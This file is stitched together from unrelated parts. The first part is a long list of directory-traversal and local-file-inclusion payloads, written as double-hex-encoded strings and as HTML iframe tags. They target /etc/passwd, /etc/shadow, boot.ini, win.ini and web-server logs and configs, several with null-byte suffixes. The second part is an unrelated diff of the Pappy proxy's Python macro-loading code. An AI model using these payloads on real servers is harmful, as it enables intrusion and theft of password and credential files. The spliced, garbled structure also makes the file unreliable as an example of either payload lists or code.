3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373336383631363436663737323533303330
32663265326535633265326535633265326535633265326535633265326535633265326535633737363936653665373435633737363936653265363936653639
326532653266326532653266373736393665363436663737373332663737363936653265363936653639
3265326532663266326532653266326632653265326632663265326532663266326532653266326636323666366637343265363936653639
32653265356332653265326632653265356332653265326636323666366637343265363936653639
32653265356332653265326632653265356332653265326632653265356332653265326632653265356332653265326636323666366637343265363936653639
35633265326532653265326535633563326532653265326532653563356332653265326532653265
3634336135633431373037303533363537323736356334643739353335313463
3633336135633431373037303533363537323736356334643739353335313463
3633336135373439346534343466353735333266373337393733373436353664333333323266
32663433336135633530373236663637373236313664323034363639366336353733
32663434336135633530373236663637373236313664323034363639366336353733
32663433336132663639366536353734373037353632326636363734373037323666366637343266
32663632366636663734326636373732373536323266363737323735363232653633366636653636
3266373037323666363332663639366537343635373237323735373037343733
3266373037323666363332663633373037353639366536363666
3266373037323666363332663664363536643639366536363666
326532653266363137303631363336383635326636633666363737333266363537323732366637323265366336663637
3265326532663631373036313633363836353266366336663637373332663631363336333635373337333265366336663637
326532653266326532653266363137303631363336383635326636633666363737333266363537323732366637323265366336663637
3265326532663265326532663631373036313633363836353266366336663637373332663631363336333635373337333265366336663637
326532653266326532653266326532653266363137303631363336383635326636633666363737333266363537323732366637323265366336663637
3265326532663265326532663265326532663631373036313633363836353266366336663637373332663631363336333635373337333265366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266363537343633326636383734373437303634326636633666363737333266363136333633363537333566366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266363537343633326636383734373437303634326636633666363737333266363136333633363537333265366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266363537343633326636383734373437303634326636633666363737333266363537323732366637323566366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266363537343633326636383734373437303634326636633666363737333266363537323732366637323265366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663737373737373266366336663637373332663631363336333635373337333566366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663737373737373266366336663637373332663631363336333635373337333265366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373537333732326636633666363336313663326636313730363136333638363532663663366636373733326636313633363336353733373335663230366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373537333732326636633666363336313663326636313730363136333638363532663663366636373733326636313633363336353733373332653230366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266366336663637326636313730363136333638363532663631363336333635373337333566366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663663366636373266363137303631363336383635333232663631363336333635373337333566366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266366336663637326636313730363136333638363532663631363336333635373337333265366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663663366636373266363137303631363336383635333232663631363336333635373337333265366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373636313732326636633666363732663631363336333635373337333566366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373636313732326636633666363732663631363336333635373337333265366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266373737373737326636633666363737333266363537323732366637323566366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266373737373737326636633666363737333266363537323732366637323265366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663735373337323266366336663633363136633266363137303631363336383635326636633666363737333266363537323732366637323566366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637353733373232663663366636333631366332663631373036313633363836353266366336663637373332663635373237323666373232653663323036663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373636313732326636633666363732663631373036313633363836353266363537323732366637323566366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266366336663637326636313730363136333638363533323266363537323732366637323566366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373636313732326636633666363732663631373036313633363836353266363537323732366637323265366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266366336663637326636313730363136333638363533323266363537323732366637323265366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663663366636373266363537323732366637323566366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663663366636373266363537323732366637323265366336663637
326636353734363332663639366536393734326536343266363137303631363336383635
3266363537343633326636393665363937343265363432663631373036313633363836353332
326636353734363332663638373437343730363432663638373437343730363432653633366636653636
32663635373436333266363137303631363336383635326636313730363136333638363532653633366636653636
3266363537343633326636313730363136333638363532663638373437343730363432653633366636653636
3266363537343633326636313730363136333638363533323266363137303631363336383635333232653633366636653636
32663635373436333266363137303631363336383635333232663638373437343730363432653633366636653636
3266373537333732326636633666363336313663326636313730363136333638363533323266363336663665363632663638373437343730363432653633366636653636
326637353733373232663663366636333631366332663631373036313633363836353266363336663665363632663638373437343730363432653633366636653636
326636663730373432663631373036313633363836353266363336663665363632663638373437343730363432653633366636653636
32663638366636643635326636313730363136333638363532663638373437343730363432653633366636653636
3266363836663664363532663631373036313633363836353266363336663665363632663638373437343730363432653633366636653636
326636353734363332663631373036313633363836353332326637333639373436353733326436313736363136393663363136323663363532663634363536363631373536633734
3266363537343633326636313730363136333638363533323266373636383666373337343733326536343266363436353636363137353663373435663736363836663733373432653639366536333663373536343635
32663635373436333266373036313733373337373634
32663635373436333266373336383631363436663737
3266363537343633326636373732366637353730
3266363537343633326637333635363337353732363937343739326636373732366637353730
32663635373436333266373336353633373537323639373437393266373036313733373337373634
326636353734363332663733363536333735373236393734373932663735373336353732
326636353734363332663733363536333735373236393734373932663635366537363639373236663665
32663635373436333266373336353633373537323639373437393266366336393664363937343733
32663735373337323266366336393632326637333635363337353732363937343739326636643662373537333635373232653634363536363631373536633734
<iframe width="420" height="315" src="/etc/master.passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/master.passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="etc/shadow%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/..\..\..\..\..\..\winnt\win.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../windows/win.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="..//..//..//..//..//boot.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="..\../..\../boot.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="..\../..\../..\../..\../boot.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="\.....\\\.....\\\....." frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="d:\AppServ\MySQL" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="c:\AppServ\MySQL" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="c:WINDOWS/system32/" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/C:\Program Files" frameborder="0" allowfullscreen></iframe>;
<iframe width="420" height="315" src="/D:\Program Files" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/C:/inetpub/ftproot/" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/boot/grub/grub.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/proc/interrupts" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/proc/cpuinfo" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/proc/meminfo" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../apache/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../apache/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../apache/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/acces_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/acces.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/access_ log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/access. log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/init.d/apache" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/init.d/apache2" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/httpd/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache/apache.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/apache2.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/usr/local/apache2/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/usr/local/apache/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/opt/apache/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/home/apache/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/home/apache/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/sites-available/default" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/vhosts.d/default_vhost.include" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/shadow" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/group" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/group" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/user" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/environ" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/limits" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/usr/lib/security/mkuser.default" frameborder="0" allowfullscreen></iframe>

View file

@ -4,626 +4,297 @@ import os
import random
import re
import stat
from jinja2 import Environment, FileSystemLoader
from pappyproxy.pappy import session
from pappyproxy.util import PappyException, load_reqlist
from twisted.internet import defer
from collections import namedtuple
## Template generating functions
# Must be declared before MacroTemplate class
@defer.inlineCallbacks
def gen_template_args_macro(args):
if len(args) > 0:
reqids = args[0]
reqs = yield load_reqlist(reqids)
else:
reqs = []
defer.returnValue(macro_from_requests(reqs))
from .proxy import InterceptMacro
def gen_template_generator_noargs(name):
def f(args):
subs = {}
subs['macro_name'] = 'Macro %d' % random.randint(1,99999999)
subs['short_name'] = ''
return MacroTemplate.fill_template(name, subs)
return f
class MacroException(Exception):
pass
class Macro(object):
"""
A class representing a macro that can perform a series of requests and add
data to storage.
"""
def __init__(self, filename=''):
self.name = ''
self.short_name = None
self.file_name = '' # name from the file
self.filename = filename or '' # filename we load from
self.source = None
if self.filename:
self.load()
def __repr__(self):
s = self.name
names = []
if hasattr(self.source, 'SHORT_NAME'):
if self.source.SHORT_NAME:
names.append(self.source.SHORT_NAME)
names.append(self.file_name)
s += ' (%s)' % ('/'.join(names))
return "<Macro %s>" % s
def load(self):
if self.filename:
match = re.findall('.*macro_(.*).py$', self.filename)
self.file_name = match[0]
st = os.stat(self.filename)
if (st.st_mode & stat.S_IWOTH):
raise PappyException("Refusing to load world-writable macro: %s" % self.filename)
module_name = os.path.basename(os.path.splitext(self.filename)[0])
self.source = imp.load_source('%s'%module_name, self.filename)
if not hasattr(self.source, 'MACRO_NAME'):
raise PappyException('Macro in %s does not define MACRO_NAME' % self.filename)
self.name = self.source.MACRO_NAME
if self.name == '':
raise PappyException('Macro in %s cannot have a blank name' % self.filename)
if hasattr(self.source, 'SHORT_NAME'):
self.short_name = self.source.SHORT_NAME
else:
self.short_name = None
else:
self.source = None
def execute(self, args):
# Execute the macro
if self.source:
self.source.run_macro(args)
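For reference, a minimal macro file that Macro.load() accepts might look like the sketch below; the filename must match macro_*.py, MACRO_NAME is required by the checks above, SHORT_NAME is optional, and the file name and body here are illustrative only:

    # macro_example.py -- minimal sketch of a macro file for the Macro class above
    MACRO_NAME = 'Example Macro'  # required; load() raises if missing or blank
    SHORT_NAME = 'ex'             # optional

    def run_macro(args):
        # called by Macro.execute() with the console's argument list
        print 'example macro ran with args: %s' % (args,)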
class InterceptMacro(object):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
self.name = ''
self.short_name = None
self.intercept_requests = False
self.intercept_responses = False
self.intercept_ws = False
self.async_req = False
self.async_rsp = False
self.async_ws = False
def __repr__(self):
return "<InterceptingMacro (%s)>" % self.name
def init(self, args):
pass
def mangle_request(self, request):
return request
def mangle_response(self, request):
return request.response
def mangle_ws(self, request, message):
return message
@defer.inlineCallbacks
def async_mangle_request(self, request):
defer.returnValue(request)
@defer.inlineCallbacks
def async_mangle_response(self, request):
defer.returnValue(request.response)
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
defer.returnValue(message)
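As a sketch of using this base class directly, an in-memory intercepting macro only overrides the hooks it needs and sets the matching intercept_* flag; the dict-like request.headers access below is an assumption about the Request API, which is not shown in this diff:

    class StripCookies(InterceptMacro):
        def __init__(self):
            InterceptMacro.__init__(self)
            self.name = 'Strip Cookies'
            self.intercept_requests = True

        def mangle_request(self, request):
            # drop the Cookie header before the request is forwarded
            if 'Cookie' in request.headers:  # assumed dict-like headers
                del request.headers['Cookie']
            return request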
class FileInterceptMacro(InterceptMacro):
"""
An intercepting macro that loads a macro from a file.
"""
def __init__(self, filename=''):
def __init__(self, client, filename=''):
InterceptMacro.__init__(self)
self.file_name = '' # name from the file
self.filename = filename or '' # filename we load from
self.name = '' # name from the file
self.file_name = filename or '' # filename we load from
self.source = None
self.client = client
if self.filename:
if self.file_name:
self.load()
def __repr__(self):
s = self.name
names = []
if hasattr(self.source, 'SHORT_NAME'):
if self.source.SHORT_NAME:
names.append(self.source.SHORT_NAME)
names.append(self.file_name)
s += ' (%s)' % ('/'.join(names))
return "<InterceptingMacro %s>" % s
def load(self):
if self.filename:
match = re.findall('.*int_(.*).py$', self.filename)
if len(match) > 0:
self.file_name = match[0]
else:
self.file_name = self.filename
st = os.stat(self.filename)
if self.file_name:
match = re.findall('.*int_(.*).py$', self.file_name)
self.name = match[0]
# yes there's a race condition here, but it's better than nothing
st = os.stat(self.file_name)
if (st.st_mode & stat.S_IWOTH):
raise PappyException("Refusing to load world-writable macro: %s" % self.filename)
module_name = os.path.basename(os.path.splitext(self.filename)[0])
self.source = imp.load_source('%s'%module_name, self.filename)
self.name = self.source.MACRO_NAME
if self.name == '':
raise PappyException('Macro in %s cannot have a blank name' % self.filename)
if hasattr(self.source, 'SHORT_NAME'):
self.short_name = self.source.SHORT_NAME
else:
self.short_name = None
if hasattr(self.source, 'mangle_request') and \
hasattr(self.source, 'async_mangle_request'):
raise PappyException('Intercepting macro in %s cannot define both mangle_request and async_mangle_request' % self.filename)
if hasattr(self.source, 'mangle_response') and \
hasattr(self.source, 'async_mangle_response'):
raise PappyException('Intercepting macro in %s cannot define both mangle_response and async_mangle_response' % self.filename)
if hasattr(self.source, 'mangle_ws') and \
hasattr(self.source, 'async_mangle_ws'):
raise PappyException('Intercepting macro in %s cannot define both mangle_ws and async_mangle_ws' % self.filename)
raise MacroException("Refusing to load world-writable macro: %s" % self.file_name)
module_name = os.path.basename(os.path.splitext(self.file_name)[0])
self.source = imp.load_source('%s'%module_name, self.file_name)
else:
self.source = None
# Update what we can do
if self.source and hasattr(self.source, 'mangle_request'):
self.intercept_requests = True
self.async_req = False
elif self.source and hasattr(self.source, 'async_mangle_request'):
self.intercept_requests = True
self.async_req = True
else:
self.intercept_requests = True
self.intercept_requests = False
if self.source and hasattr(self.source, 'mangle_response'):
self.intercept_responses = True
self.async_rsp = False
elif self.source and hasattr(self.source, 'async_mangle_response'):
self.intercept_responses = True
self.async_rsp = True
else:
self.intercept_responses = False
if self.source and hasattr(self.source, 'mangle_ws'):
if self.source and hasattr(self.source, 'mangle_websocket'):
self.intercept_ws = True
self.async_ws = False
elif self.source and hasattr(self.source, 'async_mangle_ws'):
self.intercept_ws = True
self.async_ws = True
else:
self.intercept_ws = False
def init(self, args):
if hasattr(self.source, 'init'):
self.source.init(args)
self.source.init(self.client, args)
def mangle_request(self, request):
if hasattr(self.source, 'mangle_request'):
req = self.source.mangle_request(request)
return req
return self.source.mangle_request(self.client, request)
return request
def mangle_response(self, request):
def mangle_response(self, request, response):
if hasattr(self.source, 'mangle_response'):
rsp = self.source.mangle_response(request)
return rsp
return request.response
return self.source.mangle_response(self.client, request, response)
return response
def mangle_ws(self, request, message):
if hasattr(self.source, 'mangle_ws'):
mangled_ws = self.source.mangle_ws(request, message)
return mangled_ws
def mangle_websocket(self, request, response, message):
if hasattr(self.source, 'mangle_websocket'):
return self.source.mangle_websocket(self.client, request, response, message)
return message
@defer.inlineCallbacks
def async_mangle_request(self, request):
if hasattr(self.source, 'async_mangle_request'):
req = yield self.source.async_mangle_request(request)
defer.returnValue(req)
defer.returnValue(request)
class MacroFile:
"""
A class representing a file that can be executed to automate actions
"""
@defer.inlineCallbacks
def async_mangle_response(self, request):
if hasattr(self.source, 'async_mangle_response'):
rsp = yield self.source.async_mangle_response(request)
defer.returnValue(rsp)
defer.returnValue(request.response)
def __init__(self, filename=''):
self.name = '' # name from the file
self.file_name = filename or '' # filename we load from
self.source = None
if self.file_name:
self.load()
def load(self):
if self.file_name:
match = re.findall('.*macro_(.*).py$', self.file_name)
self.name = match[0]
st = os.stat(self.file_name)
if (st.st_mode & stat.S_IWOTH):
raise MacroException("Refusing to load world-writable macro: %s" % self.file_name)
module_name = os.path.basename(os.path.splitext(self.file_name)[0])
self.source = imp.load_source('%s'%module_name, self.file_name)
else:
self.source = None
def execute(self, client, args):
# Execute the macro
if self.source:
self.source.run_macro(client, args)
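Under the new API the macro file receives the client as well; a minimal macro_*.py sketch (the body is illustrative, and the ProxyClient methods available to it are not part of this diff):

    # macro_example.py -- sketch of a macro file for MacroFile.execute()
    def run_macro(client, args):
        # client is the ProxyClient the console is attached to;
        # args is the argument list passed to MacroFile.execute()
        print("example macro ran with %d args" % len(args))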
MacroTemplateData = namedtuple("MacroTemplateData", ["filename", "description", "argdesc", "fname_fmt"])
